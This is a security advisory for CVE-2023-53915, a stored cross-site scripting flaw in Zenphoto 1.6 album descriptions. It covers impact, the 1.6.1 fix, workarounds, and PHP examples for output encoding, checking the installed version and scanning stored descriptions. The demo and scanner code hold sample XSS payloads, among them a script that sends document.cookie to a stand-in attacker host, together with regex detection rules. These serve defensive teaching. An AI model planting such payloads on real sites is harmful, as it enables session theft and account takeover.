CVE-2023-53915

4.6 MEDIUM

📋 TL;DR

Zenphoto 1.6 contains a stored cross-site scripting (XSS) vulnerability: an authenticated user with album creation privileges can store HTML or JavaScript in an album description, and that markup executes in the browser of anyone who later views the album page, including site administrators. Every Zenphoto 1.6 installation that grants album privileges to accounts beyond a single trusted administrator is exposed; the fix is in 1.6.1.

💻 Affected Systems

Products:
  • Zenphoto
Versions: 1.6
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires an authenticated account with album creation (or editing) privileges. All operating systems running Zenphoto 1.6 are affected.

⚠️ Risk & Real-World Impact

🔴 Worst Case

An attacker with album privileges plants a script that runs in an administrator's browser. It can steal the admin session cookie where that cookie is not marked HttpOnly, and even where it is, it can drive the admin's authenticated session to create accounts, change settings or deface the site, and can redirect visitors to attacker-controlled pages. That amounts to compromise of the whole Zenphoto installation and its user data.

🟠 Likely Case

A user with album creation privileges stores a script in a description; it executes when other users, including administrators, open that album, stealing session cookies or performing limited client-side actions on their behalf.

🟢 If Mitigated

With output encoding applied where descriptions are rendered, injected markup is displayed as harmless text rather than parsed as HTML, and nothing executes.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access. Public proof-of-concept demonstrates HTML injection via album description field.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.6.1

Vendor Advisory: https://www.zenphoto.org/news/zenphoto-1.6/

Restart Required: No

Instructions:

1. Back up the Zenphoto installation and its database.
2. Download Zenphoto 1.6.1 from the official website.
3. Replace the application files with the new version, preserving your configuration and uploaded albums.
4. Confirm the admin dashboard reports version 1.6.1.

🔧 Temporary Workarounds

Output Encoding (preferred)

Encode album descriptions at the point where the theme renders them, so that stored markup is displayed as text rather than parsed: pass the description through htmlspecialchars() with ENT_QUOTES and the UTF-8 charset (or an equivalent encoder) before echoing it. This neutralizes payloads that are already stored as well as new ones.

Input Validation Filter

Add server-side validation that strips or escapes HTML in the album description before it is stored, by applying htmlspecialchars() or an allow-list HTML sanitizer in the album creation/editing code. Caveats: this does nothing for descriptions already in the database (scan and clean those separately), and escaping at input combined with escaping at output double-encodes legitimate text.

Both workarounds touch Zenphoto files. Keep the change in the theme where possible; edits to zp-core are overwritten when the 1.6.1 files are installed.
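As an added illustration (this is not Zenphoto's code), the following PHP contrasts the vulnerable echo with the tag-stripping shortcut and with output encoding, then checks each rendering for constructs a browser would execute. The function names, the wrapper markup and the payloads are assumptions constructed for the example.

```php
<?php
// Added example, not Zenphoto code. It contrasts the vulnerable echo, an
// insufficient tag-stripping fix, and the recommended output encoding, then
// checks each rendering for executable constructs. The function names and
// the wrapper markup are assumptions for illustration.
declare(strict_types=1);

const WRAP_OPEN  = '<div class="albumdesc">';
const WRAP_CLOSE = '</div>';

/** Vulnerable pattern: the stored description is echoed into the page unchanged. */
function renderDescVulnerable(string $desc): string
{
    return WRAP_OPEN . $desc . WRAP_CLOSE;
}

/** Insufficient mitigation: strip_tags() keeps attributes on the tags it allows. */
function renderDescStripTags(string $desc): string
{
    return WRAP_OPEN . strip_tags($desc, '<b><i><a>') . WRAP_CLOSE;
}

/** Hardened pattern: encode for the HTML text context at output time. */
function renderDescEscaped(string $desc): string
{
    $safe = htmlspecialchars($desc, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return WRAP_OPEN . $safe . WRAP_CLOSE;
}

/** Crude check: does the description part of the rendering contain a tag that could run script? */
function looksExecutable(string $html): bool
{
    $inner = substr($html, strlen(WRAP_OPEN), -strlen(WRAP_CLOSE));
    $pattern = '/<(?:script|iframe)\b'                                   // script or frame element
             . '|<[a-z][^>]*\son[a-z]+\s*='                               // event-handler attribute inside a tag
             . '|<[a-z][^>]*\s(?:href|src)\s*=\s*["\']?\s*javascript:/i'; // javascript: URL in a tag
    return (bool) preg_match($pattern, $inner);
}

// Constructed payloads for the demonstration; not taken from any real report.
$payloads = [
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    '<img src=x onerror="alert(document.domain)">',
    '<b onmouseover="alert(1)">hover me</b>',   // attribute survives strip_tags('<b>')
    '<a href="javascript:alert(1)">link</a>',    // URL survives strip_tags('<a>')
    'Plain description with <3 and "quotes"',    // legitimate text must stay readable
];

foreach ($payloads as $p) {
    printf("%-70s vuln=%s strip=%s escaped=%s\n",
        $p,
        looksExecutable(renderDescVulnerable($p)) ? 'EXEC' : 'ok',
        looksExecutable(renderDescStripTags($p))  ? 'EXEC' : 'ok',
        looksExecutable(renderDescEscaped($p))    ? 'EXEC' : 'ok');
}
```

Two things the run shows: the encoded rendering never contains a `<`, so none of the payloads survive it, while strip_tags() with an allow-list still passes the `onmouseover` attribute and the `javascript:` link through unchanged. If descriptions must keep some legitimate markup, use an allow-list sanitizer that also removes attributes and URL schemes, not strip_tags(), and still encode everything that is meant to be text.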

🧯 If You Can't Patch

  • Restrict album creation and editing privileges to trusted administrators only
  • Review existing album descriptions for injected markup and remove anything containing script, iframe, event-handler attributes or javascript: URLs
  • Implement web application firewall rules to block HTML/script injection patterns in album description submissions (defence in depth only; WAF signatures are routinely bypassed)

🔍 How to Verify

Check if Vulnerable:

An installation is vulnerable if it runs Zenphoto 1.6 (any build before 1.6.1). Read the version from the admin dashboard or from zp-core/version.php.

Check Version:

Open the admin dashboard, or inspect the contents of zp-core/version.php on the server.

Verify Fix Applied:

After updating, confirm the admin dashboard shows 1.6.1. Then, in a throwaway test album, save a description containing a script-bearing payload such as <img src=x onerror=alert(1)> and view the album page: nothing must execute (no dialog), and the page source must show the markup either entity-encoded (&lt;img ...) or removed. Delete the test album afterwards.
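An added helper (not part of Zenphoto) for the version check above: it reads zp-core/version.php, extracts the version and classifies it against the affected and fixed releases, handling an unreadable file, a missing define, and versions older than 1.6 that this advisory does not cover. It assumes the file declares the version as define('ZENPHOTO_VERSION', '1.6'); if your install uses a different constant, rely on the admin dashboard instead.

```php
<?php
// Added example, not part of Zenphoto. Reads zp-core/version.php, extracts the
// version and reports whether it falls in the affected range. Assumption: the
// file defines the version as define('ZENPHOTO_VERSION', '1.6'); if the
// constant name differs in your install, check the admin dashboard instead.
declare(strict_types=1);

const AFFECTED_FROM = '1.6';
const FIXED_IN      = '1.6.1';

/** Returns the version string from version.php source, or null if not found. */
function parseZenphotoVersion(string $phpSource): ?string
{
    $re = '/define\(\s*[\'"]ZENPHOTO_VERSION[\'"]\s*,\s*[\'"]([0-9][^\'"]*)[\'"]\s*\)/';
    return preg_match($re, $phpSource, $m) ? $m[1] : null;
}

/** 'affected', 'fixed', or 'older' (below 1.6; not covered by this advisory). */
function classifyVersion(string $version): string
{
    if (version_compare($version, AFFECTED_FROM, '<')) {
        return 'older';
    }
    // version_compare() orders '1.6' below '1.6.1', which is what is needed here.
    return version_compare($version, FIXED_IN, '<') ? 'affected' : 'fixed';
}

/** Human-readable verdict for an installation root directory. */
function checkInstall(string $zenphotoRoot): string
{
    $file = rtrim($zenphotoRoot, '/') . '/zp-core/version.php';
    if (!is_readable($file)) {
        return "cannot read $file";
    }
    $v = parseZenphotoVersion((string) file_get_contents($file));
    if ($v === null) {
        return "no ZENPHOTO_VERSION define found in $file (check the admin dashboard)";
    }
    $class = classifyVersion($v);
    if ($class === 'affected') {
        return "Zenphoto $v: AFFECTED by CVE-2023-53915, update to " . FIXED_IN . ' or later';
    }
    if ($class === 'fixed') {
        return "Zenphoto $v: contains the fix";
    }
    return "Zenphoto $v: older than " . AFFECTED_FROM . ', not covered by this advisory (update anyway)';
}

// Constructed version.php contents, standing in for real files.
foreach (['1.6', '1.6.1', '1.5.9'] as $sample) {
    $src = "<?php\ndefine('ZENPHOTO_VERSION', '$sample');\n";
    printf("%-6s -> %s\n", $sample, classifyVersion((string) parseZenphotoVersion($src)));
}

// Against a real install: php check-zenphoto-version.php /var/www/zenphoto
if (isset($argv[1])) {
    echo checkInstall($argv[1]), "\n";
}
```

The script name and install path in the usage comment are placeholders. Run it as the web server user or another account that can read zp-core so that the is_readable() check is meaningful.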

📡 Detection & Monitoring

Log Indicators:

  • Unusual album creation/modification activity, especially from low-privilege accounts or outside normal hours
  • <script>, <iframe>, event-handler attributes (onerror=, onload=, ...) or javascript: URLs in album description values in the albums table, or in query logs for writes to it

Network Indicators:

  • Unexpected <script> or <iframe> tags in album page responses, or requests from viewers' browsers to unfamiliar hosts immediately after loading an album page

SIEM Query:

Correlate album creation or edit events with description content containing <script, <iframe, an on*= attribute inside a tag, or a javascript: URL, and alert on the first such write per account.
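The indicator rules above, as an added example run over stored album descriptions (not Zenphoto code and not a product query): each rule is a regex over the raw stored value, and the scanner reports which rule fired for which row. The rows are constructed samples; the table and column names in the comment (zp_albums, `desc`) are assumptions about the schema.

```php
<?php
// Added example, not part of Zenphoto or any SIEM. Runs the indicator rules
// over stored album descriptions and reports which rule fired for which row.
// Assumptions: rows come from a query such as
//   SELECT id, folder, `desc` FROM zp_albums
// (table prefix and column names assumed); the sample rows below are constructed.
declare(strict_types=1);

/** Rule name => case-insensitive regex over the raw stored description. */
const XSS_INDICATORS = [
    'script_tag'     => '/<script\b/i',
    'frame_or_embed' => '/<(?:iframe|object|embed)\b/i',
    'svg_or_math'    => '/<(?:svg|math)\b/i',
    'event_handler'  => '/<[a-z][^>]*\son[a-z]+\s*=/i',   // attribute inside a tag only
    'script_url'     => '/<[a-z][^>]*\s(?:href|src|action)\s*=\s*["\']?\s*(?:javascript:|data:text\/html)/i',
];

/**
 * @param array<int, array{id:int, folder:string, desc:string}> $rows
 * @return array<int, array{id:int, folder:string, rules:string[]}> rows with at least one hit
 */
function scanDescriptions(array $rows): array
{
    $findings = [];
    foreach ($rows as $row) {
        $hits = [];
        foreach (XSS_INDICATORS as $name => $re) {
            if (preg_match($re, $row['desc'])) {
                $hits[] = $name;
            }
        }
        if ($hits !== []) {
            $findings[] = ['id' => $row['id'], 'folder' => $row['folder'], 'rules' => $hits];
        }
    }
    return $findings;
}

// Constructed sample rows: two benign, three malicious.
$rows = [
    ['id' => 1, 'folder' => 'coast-2023', 'desc' => 'Photos from the coast. <b>Sunny!</b>'],
    ['id' => 2, 'folder' => 'notes',      'desc' => 'Turn on the lights = better shots'],  // "on ... =" outside a tag: no hit
    ['id' => 3, 'folder' => 'test',       'desc' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'],
    ['id' => 4, 'folder' => 'misc',       'desc' => '<img src=x onerror=alert(document.domain)>'],
    ['id' => 5, 'folder' => 'links',      'desc' => '<a href="JavaScript:alert(1)">click</a>'],
];

foreach (scanDescriptions($rows) as $f) {
    printf("album id=%d folder=%s rules=%s\n", $f['id'], $f['folder'], implode(',', $f['rules']));
}
```

Expected hits are rows 3, 4 and 5 (script_tag, event_handler and script_url respectively); rows 1 and 2 stay silent because the event-handler rule only fires inside a tag. The same rules can be pointed at fetched album page bodies for the network indicators, but themes legitimately include script tags, so restrict that check to the description element or diff against a known-clean rendering.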
